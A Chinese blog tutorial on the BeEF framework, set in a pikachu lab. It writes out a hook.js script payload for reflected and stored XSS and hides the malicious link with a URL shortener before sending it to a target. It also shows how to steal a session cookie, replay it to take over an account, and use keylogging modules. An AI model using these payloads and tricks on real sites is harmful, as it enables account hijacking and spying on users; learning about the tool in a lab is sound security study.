beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等

这篇具有很好参考价值的文章主要介绍了beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :XSS漏洞应用-Beef
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


一、Beef

第一步:安装beef

1.首先输入命令进行安装.

apt-get install beef-xss
发现安装不了,但是有提示.
image.png

2.根据提示进行输入命令.

apt-get update

3.再输入命令进行安装.

apt-get install beef-xss

4.直接运行Beef-xss.

beef-xss
标记处的意思是叫你 修改密码(密码输入时不可见.),本身默认的密码和账号分别为 beef 和 beef, 这里我设置的密码是root
image.png

5.访问 http://127.0.0.1:3000/ui/panel

账号:beef 密码:是你在上面输入的密码(这里我输入的是:root)
成功进入的页面.
image.png

6. 启动 Beef 工具.

beef-xss
image.png

7.利用 生成的链接 写入存在有 XSS漏洞 的地方.

命令概括:
<script src="http://192.168.1.105:3000/hook.js"></script>
实战一般是内网 或者 公网IP

反射型的利用:

pikachu地址:192.168.43.51
用户地址:192.168.43.196
攻击机地址: 192.168.43.248

(1)找到存在 XSS漏洞 的地方.

写入的命令:
<script src="http://192.168.43.248:3000/hook.js"></script>
image.png

(2)把生成的新链接 复制 下来.(写入 XSS漏洞代码 的链接)

http://192.168.43.51:3355/vul/xss/xss_reflected_get.php?message=%3Cscript+src%3D%22http%3A%2F%2F192.168.43.248%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&submit=submit
image.png

(3)隐藏链接 (由于链接过长容易被发现.)

利用工具生成为短链接:45短网址
image.png
https://o4rx.cn/84LAg

(4)把短链接发给靶机访问.(但靶机访问就会受到 XSS漏洞 的攻击.)

https://o4rx.cn/84LAg
image.png
自动跳转到下面:
image.png

(5)在 kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel
image.png

存储型的利用:

(1) 找到存在 XSS漏洞 的地方.

写入的命令:
<script src="http://192.168.43.248:3000/hook.js"></script>
image.png

(2)用 靶机 去访问这个留言板.(当靶机访问留言页面的时候,就已经遭到到我们 XSS漏洞 的攻击了.)

靶机访问网站的留言页面:
image.png

(3)在 kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel
image.png

Beef的好玩的功能:

image.png
命今颜色(Color):

  • 绿色对目标主机生效并且不可见(不会被发现)
  • 橙色对目标主机生效但可能可见(可能被发现)
  • 灰色对目标主机来未必生效(可验证下)
  • 红色对目标主机不生效

主要模块

  • Broser:主要是针对浏览器的一些信息收集或攻击,其下的子选项卡Hooked Domain主要是获取HTTP属性值,比如cookie、表单值等,还可以做写简单的浏览器操作,比如替换href值,弹出警告框,重定向浏览器等。这个选项卡下的有些模块会根据受害者的浏览器来决定是否显示。主要是浏览器通用操作和其他基本信息检测。
  • Chrome extensions:主要是针对谷歌浏览器扩展插件
  • Debug:调试功能
  • Exploits:漏洞利用,主要利用一些已公开的漏洞进行攻击测试
  • Host:针对主机,比如检测主机的浏览器、系统信息、IP地址、安装软件等等
  • IPEC:协议间通信。主要是用来连接、控制受害者浏览器的
  • Metasploit:Beef可通过配置和metasploit平台联合,一旦有受害者出现,可通过信息收集确定是否存在漏洞,进一步方便metasploit攻击测试
  • Misc:杂项。
  • Network:网络扫描
  • Persistence:维护受害者访问
  • Phonegap:手机测试
  • Social engineering:社会工程学攻击

在鱼儿上钩之后,可以有如下的功能:

(1)Logs日志

如下所示,需要刷新才能看到,有 键盘记录,鼠标的坐标,鼠标单击 双击 是否聚焦等等!
image.png

(2)会话劫持

1、选中靶机,在command面板找到GetCookie命令并执行
image.png
2、执行后可以看到已经获取到Cookie了
data: cookie=PHPSESSID=ji79tanduunuhs7vgogcqsjhj4; BEEFHOOK=GOdFhm6ZZh4iO0OXy7I4zOcysj6v5ud3S10hOZeujR8aapRwJaLQHpuDd8YfMapyrnVEP3OMDH5ziRYY
image.png
3、Cookie利用。在Kali系统上,打开对应的网址,按下F12进入控制台模块,输入命令如下:
document.cookie="PHPSESSID=ji79tanduunuhs7vgogcqsjhj4; BEEFHOOK=GOdFhm6ZZh4iO0OXy7I4zOcysj6v5ud3S10hOZeujR8aapRwJaLQHpuDd8YfMapyrnVEP3OMDH5ziRYY"刷新,可以看到首页登录了对应的账号。

(3)浏览器重定向

image.png

(4)弹窗alert

image.png

undefined文章来源地址https://www.toymoban.com/news/detail-431595.html

到了这里,关于beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全/前端XSS防护】一文带你了解HTML的特殊字符转义及编码

    在 HTML 中,有一些特殊字符不可直接使用,需要使用转义字符或实体编码来表示。这是为了避免这些字符与 HTML 标签和语法产生冲突。同时,也是为了防范前端XSS。 例如,有些特殊字符(如 和 )作为HTML标签的一部分,要是没有被特殊处理可能被恶意XSS。 HTML的特殊字符转义

    2024年02月04日
    浏览(45)
  • 解决kali beef启动失败解问题

    只限于出现这个提示的时候使用 卸载 ruby apt remove ruby 卸载 beef apt remove beef-xss 重新安装ruby apt-get install ruby apt-get install ruby-dev libpcap-dev gem install eventmachine 重新安装beef apt-get install beef-xss 弄完以上步骤如果还是不行就重启kali再试试  

    2024年01月17日
    浏览(42)
  • 一文带你学会如何写一份糟糕透顶的简历

    我们每个人几乎都会面对找工作这件事,而找工作或者说求职首先就是要写一份简历。今天狗哥将以一个不同的视角带你写一份 无与伦比 , 糟糕透顶 的求职简历,说实话,其实几年前,我就是这么写的。 目录 1. 文件名 2.  基本信息 3. 教育经历 4.  技术能力 5. 工作经历

    2023年04月25日
    浏览(89)
  • 什么是Docker容器?一文带你了解,看完直接学会

    1.1麻烦的环境部署 1.2虚拟机(Virtual Machine) 占用资源多:虚拟机需要安装整个操作系统,自然会消耗大量内存和硬盘空间。如我们只需要运行1MB的软件,有时候也不得不安装几个G的环境才能运行。 运行步骤冗余:虚拟机安装的是完整的系统,每次运行程序都需要按部就班,

    2024年02月03日
    浏览(43)
  • 如何用Postman做接口自动化测试?一文带你学会

    什么是自动化测试 把人对软件的测试行为转化为由机器执行测试行为的一种实践。 例如GUI自动化测试,模拟人去操作软件界面,把人从简单重复的劳动中解放出来 本质是用代码去测试另一段代码,属于一种软件开发工作,已经开发完成的用例还必须随着被测试对象的改变而

    2024年04月22日
    浏览(37)
  • XSS攻击:利用Beef劫持被攻击者客户端浏览器

    实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner) 实验步骤: 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者

    2024年02月03日
    浏览(50)
  • 接口自动化测试要做什么?一文3个步骤带你成功学会!

    先了解下接口测试流程: 1、需求分析 2、Api文档分析与评审 3、测试计划编写 4、用例设计与评审 5、环境搭建(工具) 6、执行用例 7、缺陷管理 8、测试报告 了解了 接口测试的工作流程 ,那\\\"接口自动化测试\\\"怎么弄?只需要在上篇文章的基础上再梳理下就可以。为更好理解

    2024年02月08日
    浏览(46)
  • 【Node.js实战】一文带你开发博客项目之安全(sql注入、xss攻击、md5加密算法)

    个人简介 👀 个人主页: 前端杂货铺 🙋‍♂️ 学习方向: 主攻前端方向,也会涉及到服务端 📃 个人状态: 在校大学生一枚,已拿多个前端 offer(秋招) 🚀 未来打算: 为中国的工业软件事业效力n年 🥇 推荐学习:🍍前端面试宝典 🍉Vue2 🍋Vue3 🍓Vue2Vue3项目实战 🥝

    2024年02月03日
    浏览(52)
  • 一文带你学会使用SpringBoot+Avue实现短信通知功能(含重要文件代码)

    🧑‍💻作者名称:DaenCode 🎤作者简介:啥技术都喜欢捣鼓捣鼓,喜欢分享技术、经验、生活。 😎人生感悟:尝尽人生百味,方知世间冷暖。 Avue 是 基于vue和element-ui的快速开发框架 。它的核心是数据驱动UI的思想,让我们从繁琐的crud开发中解脱出来,它的写法类似easyUI,

    2024年02月12日
    浏览(44)
  • xss靶场、xss.haozi.me靶场详细通关教程

    该靶场来自xss经典靶场,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。 HTML编码网站 : Html实体编码解码 (config.net.cn) img 标签的可扩展

    2024年02月07日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包